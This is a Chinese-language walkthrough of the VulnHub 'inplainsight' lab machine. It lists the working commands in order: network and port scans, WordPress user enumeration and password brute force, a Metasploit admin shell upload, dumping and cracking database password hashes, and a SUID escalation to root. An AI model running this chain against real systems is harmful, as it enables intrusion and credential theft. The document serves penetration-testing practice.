今天实践的是vulnhub的inplainsight镜像，

下载地址，https://download.vulnhub.com/inplainsight/inplainsight1.ova，

用virtualbox导入成功，

做地址扫描，sudo netdiscover -r 192.168.0.0/24，

获取到靶机地址192.168.0.176，

继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.176，

获取到靶机有80端口的http服务，

浏览器访问http://192.168.0.176，提示了index.htnl页面，

浏览器访问http://192.168.0.176/index.htnl，

点击图片，

点击Upload Image，

查看页面源码，

对编码进行明文转换，

echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d，

获取到so-dev-wordpress路径，

对路径进行扫描，dirb http://192.168.0.176/so-dev-wordpress，

确认是wordpress，

扫描用户，wpscan --url http://192.168.0.176/so-dev-wordpress --enumerate u，

获取到mike和admin，

进行密码暴破，wpscan --url http://192.168.0.176/so-dev-wordpress -U mike,admin -P /usr/share/wordlists/dirb/common.txt，

获取到用户名密码admin/admin1，

继续浏览器访问http://192.168.0.176/so-dev-wordpress，

提示了要通过域名进行访问，inplainsight，

修改hosts文件，192.168.0.176       inplainsight，

重新登录，确认邮件是对的，登录成功，

上metasploit，

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS 192.168.0.176
set TARGETURI /so-dev-wordpress
set USERNAME admin
set PASSWORD admin1
exploit

获取到metasploit shell，getuid确认不是root，

转成普通shell，再转成交互式shell，

python3 -c 'import pty;pty.spawn("/bin/sh")'，

查看当前用户下的home路径，确认有joe和mike两个账户，

在上两层目录中查看到有wp-config.php，

内容中发现有数据库的用户名密码，

sodevwp/sodevwp/oZ2R3c2x7dLL6#hJ，

转成bash，访问数据库，mysql -u sodevwp -p，

use sodevwp;
show tables;
select * from sodevwp_users;

查看到admin和mike账户的密码hash，

保存到hash文件，用john进行暴破，

john hash -wordlist=/usr/share/wordlists/rockyou.txt，

获取到mike/skuxdelux，

切换到mike，su mike，

查看/etc/passwd文件，cat /etc/passwd，没获取到有用信息，

继续查看/etc/passwd-，获取到joe/SmashMouthNoThanks，

再继续切到joe，id确认不是root，

查找root权限的程序，find / -perm -u=s -type f 2>/dev/null，

获取到bwrap，执行bwrap，获取到新的shell，id确认是root，